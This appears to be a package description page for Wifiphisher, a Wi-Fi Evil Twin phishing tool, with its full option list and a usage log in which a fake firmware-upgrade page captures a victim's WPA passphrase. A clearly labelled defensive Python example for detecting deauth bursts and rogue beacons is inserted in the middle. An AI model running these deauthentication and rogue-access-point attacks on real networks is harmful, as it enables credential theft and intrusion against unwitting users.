wifiphisher Package Description
Wifiphisher is a security tool that mounts automated phishing attacks against Wi-Fi networks in order to obtain credentials or infect the victims with ‘malware’. It is a social engineering attack that can be used to obtain WPA/WPA2 secret passphrases and, unlike other methods, it does not require any brute forcing.
After achieving a man-in-the-middle position using the Evil Twin attack, Wifiphisher redirects all HTTP requests to an attacker-controlled phishing page.
From the victim’s perspective, the attack takes place in three phases:
- Victim is deauthenticated from their access point.
- Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point settings.
- Victim is served a realistic specially-customized phishing page.
Source: https://wifiphisher.org/docs.html
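From the defender's side, the first two phases above leave observable traces on the air: a burst of deauthentication frames naming the legitimate access point, and beacons that reuse its ESSID from another radio. The following is an added example, not part of Wifiphisher or of the original page; the record format, the AP inventory and all addresses are constructed assumptions standing in for the output of a monitor-mode sensor.

```python
from collections import defaultdict

# Constructed sample: records as a monitor-mode sensor might emit them after
# parsing 802.11 management frames. All names and addresses are made up.
FRAMES = [
    {"t": 0.0, "kind": "beacon", "essid": "CorpNet", "bssid": "aa:aa:aa:00:00:01", "sec": "WPA2"},
    {"t": 1.0, "kind": "deauth", "bssid": "aa:aa:aa:00:00:01", "dst": "ff:ff:ff:ff:ff:ff"},
    {"t": 1.1, "kind": "deauth", "bssid": "aa:aa:aa:00:00:01", "dst": "c0:ff:ee:00:00:10"},
    {"t": 1.2, "kind": "deauth", "bssid": "aa:aa:aa:00:00:01", "dst": "c0:ff:ee:00:00:10"},
    {"t": 1.3, "kind": "deauth", "bssid": "aa:aa:aa:00:00:01", "dst": "ff:ff:ff:ff:ff:ff"},
    {"t": 2.0, "kind": "beacon", "essid": "CorpNet", "bssid": "de:ad:be:00:00:02", "sec": "OPEN"},
    {"t": 2.5, "kind": "beacon", "essid": "CoffeeShop", "bssid": "bb:bb:bb:00:00:03", "sec": "OPEN"},
    {"t": 9.0, "kind": "deauth", "bssid": "bb:bb:bb:00:00:03", "dst": "c0:ff:ee:00:00:11"},
]
# Hypothetical inventory of sanctioned APs: ESSID -> (authorized BSSIDs, expected security).
KNOWN = {"CorpNet": ({"aa:aa:aa:00:00:01"}, "WPA2")}

def rogue_beacons(frames, known):
    """Beacons reusing a sanctioned ESSID from an unlisted BSSID or with different security."""
    hits = {}
    for f in frames:
        if f["kind"] == "beacon" and f["essid"] in known:
            bssids, sec = known[f["essid"]]
            reasons = [r for r, bad in (("unknown-bssid", f["bssid"] not in bssids),
                                        ("security-mismatch", f["sec"] != sec)) if bad]
            if reasons:
                hits[(f["essid"], f["bssid"])] = reasons
    return hits

def deauth_bursts(frames, window=5.0, threshold=3):
    """BSSIDs named in more than `threshold` deauth frames within any `window` seconds."""
    times = defaultdict(list)
    for f in frames:
        if f["kind"] == "deauth":
            times[f["bssid"]].append(f["t"])
    return {b for b, ts in times.items()
            if any(sum(s <= t <= s + window for t in ts) > threshold for s in ts)}

def evil_twin_alerts(frames, known):
    """ESSIDs where a deauth burst on a sanctioned AP coincides with a rogue beacon."""
    bursts = deauth_bursts(frames)
    return sorted({essid for (essid, _bssid) in rogue_beacons(frames, known)
                   if known[essid][0] & bursts})
```

Treat a rogue beacon as alertable on its own: the `-nJ` option listed below skips the deauthentication phase, so the burst signal is not always present.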
- Author: sophron
- License: GPLv3
Tools included in the wifiphisher package
wifiphisher – Automated phishing attacks against Wi-Fi networks
[*] Starting Wifiphisher 1.1GIT at 2017-02-22 08:18
usage: wifiphisher [-h] [-s SKIP] [-jI JAMMINGINTERFACE] [-aI APINTERFACE]
[-t TIMEINTERVAL] [-p PACKETS] [-d] [-nJ] [-e ESSID]
[-T TEMPLATE] [-pK PRESHAREDKEY]
optional arguments:
-h, --help show this help message and exit
-s SKIP, --skip SKIP Skip deauthing this MAC address. Example: -s
00:11:BB:33:44:AA
-jI JAMMINGINTERFACE, --jamminginterface JAMMINGINTERFACE
Choose monitor mode interface. By default script will
find the most powerful interface and starts monitor
mode on it. Example: -jI mon5
-aI APINTERFACE, --apinterface APINTERFACE
Choose access point interface. By default script will
find the most powerful interface and starts an access
point on it. Example: -aI wlan0
-t TIMEINTERVAL, --timeinterval TIMEINTERVAL
Choose the time interval between packets being sent.
Default is as fast as possible. If you see scapy
errors like 'no buffer space' try: -t .00001
-p PACKETS, --packets PACKETS
Choose the number of packets to send in each deauth
burst. Default value is 1; 1 packet to the client and
1 packet to the AP. Send 2 deauth packets to the
client and 2 deauth packets to the AP: -p 2
-d, --directedonly Skip the deauthentication packets to the broadcast
address ofthe access points and only send them to
client/AP pairs
-nJ, --nojamming Skip the deauthentication phase.
-e ESSID, --essid ESSID
Enter the ESSID of the rogue access point (Evil Twin)
This will skip Access Point selection phase.
-T TEMPLATE, --template TEMPLATE
Choose the template to run.Using this option will skip
the interactive selection
-pK PRESHAREDKEY, --presharedkey PRESHAREDKEY
Add WPA/WPA2 protection on the rogue Access Point
wifiphisher Usage Examples
Do not perform jamming (-nJ), create a wireless access point (-e “Free Wi-Fi”) and present a fake firmware upgrade to clients (-T firmware-upgrade). When a client connects, they are presented with a webpage to enter the PSK of their network:
[*] Starting Wifiphisher 1.1GIT at 2017-02-22 13:52
[+] Selecting wlan0 interface for creating the rogue Access Point
[*] Cleared leases, started DHCP, set up iptables
[+] Selecting Firmware Upgrade Page template
[*] Starting the fake access point...
Jamming devices:
DHCP Leases:
1487839973 c0:cc:f8:06:53:93 10.0.0.93 Victims-iPhone 11:c0:cc:38:66:a3:b3
HTTP requests:
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] POST 10.0.0.93 wfphshr-wpa-password=s3cr3tp4s5
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] GET 10.0.0.93